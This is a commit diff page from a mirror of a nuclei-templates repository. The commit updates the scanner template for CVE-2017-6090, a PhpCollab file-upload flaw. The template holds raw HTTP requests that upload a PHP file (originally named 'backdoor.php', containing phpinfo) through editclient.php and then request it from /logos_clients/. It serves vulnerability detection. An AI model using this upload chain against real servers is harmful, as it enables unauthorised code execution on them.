daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2017-6090.yaml

patch-1
PikPikcU 2021-07-27 19:10:51 +07:00 committed by GitHub
parent 315215aa02
commit 870339ebe1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
cves/2017/CVE-2017-6090.yaml
View File

@ -10,7 +10,7 @@ info:
requests:
- raw:
- | # REQUEST 1
POST /clients/editclient.php?id=1&action=update HTTP/1.1
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
@ -22,7 +22,7 @@ requests:
Content-Length: 237
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
@ -30,10 +30,9 @@ requests:
-----------------------------154934846911423734231554128137--
- | # REQUEST 2
GET /logos_clients/1.php HTTP/1.1
GET /logos_clients/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
matchers-condition: and
matchers: